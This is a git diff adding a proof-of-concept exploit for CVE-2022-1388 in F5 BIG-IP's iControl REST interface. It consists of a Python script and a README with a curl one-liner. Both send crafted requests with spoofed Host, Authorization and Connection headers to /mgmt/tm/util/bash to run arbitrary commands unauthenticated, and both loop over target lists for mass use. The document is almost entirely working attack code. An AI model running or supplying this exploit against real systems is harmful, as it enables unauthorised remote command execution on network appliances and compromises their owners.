diff --git a/CVE-2022-1388.py b/CVE-2022-1388.py
new file mode 100644
index 0000000..f40c37d
--- /dev/null
+++ b/CVE-2022-1388.py
@@ -0,0 +1,60 @@
+#!/usr/bin/env python3
+import argparse, requests, urllib3
+from termcolor import colored
+import concurrent.futures
+urllib3.disable_warnings()
+
+
+def exploit(target, command):
+
+    try:
+
+        url = f'https://{target}/mgmt/tm/util/bash'
+        headers = {
+            'Host': '127.0.0.1',
+            'Authorization': 'Basic YWRtaW46',
+            'X-F5-Auth-Token': '0',        
+            'Connection': 'X-F5-Auth-Token',
+            'Content-Type': 'application/json'
+        }
+
+        j = {'command':'run','utilCmdArgs':'-c "{0}"'.format(command)}
+        r = requests.post(url, headers=headers, json=j, verify=False, timeout=5)
+        
+        if ( r.status_code != 204 and r.headers['content-type'].strip().startswith('application/json')):
+            print(target + '\t> ' + r.json()['commandResult'].strip())
+
+        else:
+            print(colored('Target is not vulnerable', "yellow", attrs=['bold']))
+
+
+    except Exception as e:
+        print(colored(e, "yellow", attrs=['bold']))
+
+
+if __name__ == "__main__":
+
+
+    ## parse argument
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-t', '--target', help='The IP address of the target, eg: 127.0.0.1:80', default=False)
+    parser.add_argument("-l", "--list", action="store", help="Target urls saperated with new line", default=False)
+    parser.add_argument('-c', '--command', help='The command to execute, eg: id', default='id')
+    args = parser.parse_args()
+
+    if args.target is not False:
+        
+        exploit(args.target, args.command) 
+    
+    elif args.list is not False:
+                
+        with open(args.list) as targets:
+            
+            for target in targets:
+                target = target.rstrip()
+                exploit(target, args.command) 
+
+    else:
+
+        parser.print_help()
+        parser.exit()
diff --git a/README.MD b/README.MD
new file mode 100644
index 0000000..d686834
--- /dev/null
+++ b/README.MD
@@ -0,0 +1,17 @@
+# BIG-IP iControl REST vulnerability CVE-2022-1388 PoC
+
+This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services
+
+## PoC
+
+You can use the following curl one liner to check for the F5 BigIP vulnerability or use the provided python script.
+
+```
+cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
+```
+
+
+## References
+
+https://support.f5.com/csp/article/K23605346
+https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit